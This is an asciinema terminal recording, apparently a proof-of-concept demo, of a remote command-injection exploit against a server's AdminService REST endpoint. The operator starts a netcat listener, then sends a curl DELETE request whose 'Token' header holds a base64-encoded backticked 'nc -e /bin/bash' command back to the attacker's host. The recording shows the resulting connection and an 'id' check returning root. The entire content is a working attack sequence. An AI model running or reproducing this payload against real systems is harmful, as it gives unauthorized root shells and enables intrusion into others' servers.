{"version": 2, "width": 191, "height": 53, "timestamp": 1588935712, "env": {"SHELL": "/bin/bash", "TERM": "screen"}}
[0.053941, "o", "\u001b[01;32mpwner@pwned\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[1.483141, "o", "n"]
[1.561665, "o", "c"]
[1.678521, "o", " "]
[1.773229, "o", "-"]
[1.957801, "o", "l"]
[2.230277, "o", "v"]
[2.359562, "o", "n"]
[2.632111, "o", "k"]
[2.940886, "o", "p"]
[3.055757, "o", " "]
[3.549837, "o", "4"]
[3.683268, "o", "4"]
[3.845432, "o", "4"]
[4.597792, "o", "4"]
[4.864701, "o", "\r\n"]
[4.867029, "o", "Listening on 0.0.0.0 4444\r\n"]
[6.017706, "o", "^Z"]
[6.01799, "o", "\r\n"]
[6.01813, "o", "[1]+  Stopped                 nc -lvnkp 4444\r\n"]
[6.018341, "o", "\u001b[01;32mpwner@pwned\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[7.429294, "o", "curl -i -s -k -X 'DELETE' -H 'Host: 10.10.10.123:21412' \\\r\n"]
[7.429695, "o", "> -H 'Token: YG5jIC1lIC9iaW4vYmFzaCAxMC45LjguMSA0NDQ0ICBg' \\\r\n"]
[7.429969, "o", "> "]
[7.430202, "o", "'https://10.10.10.123:21412/AdminService/urest/v1/LogonResource'"]
[9.393199, "o", "\r\n"]
[10.959029, "o", "^C"]
[10.960491, "o", "\r\n"]
[10.960723, "o", "\u001b[01;32mpwner@pwned\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[11.718196, "o", "f"]
[11.915979, "o", "g"]
[12.039718, "o", "\r\n"]
[12.039843, "o", "nc -lvnkp 4444\r\n"]
[12.040073, "o", "Connection received on 10.10.10.123 38682\r\n"]
[12.743049, "o", "u"]
[12.910606, "o", "n"]
[12.994833, "o", "a"]
[13.059383, "o", "m"]
[13.176031, "o", "e"]
[13.265958, "o", " "]
[13.407578, "o", "-"]
[13.506196, "o", "a"]
[13.628014, "o", "\r\n"]
[13.632508, "o", "Linux 10.10.10.123 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\r\n"]
[14.085036, "o", "i"]
[14.176592, "o", "d"]
[14.318879, "o", "\r\n"]
[14.326122, "o", "uid=0(root) gid=0(root) groups=0(root)\r\n"]
[14.99166, "o", "!"]
[15.141103, "o", "!"]
[15.277879, "o", "!"]
[15.489349, "o", "\r\n"]
[16.197918, "o", "^C"]
[16.198438, "o", "\r\n"]
[16.198697, "o", "\u001b[01;32mpwner@pwned\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[17.067642, "o", "e"]
[17.199059, "o", "x"]
[17.28002, "o", "i"]
[17.455218, "o", "t"]
[17.565395, "o", "\r\n"]
[17.565499, "o", "exit\r\n"]
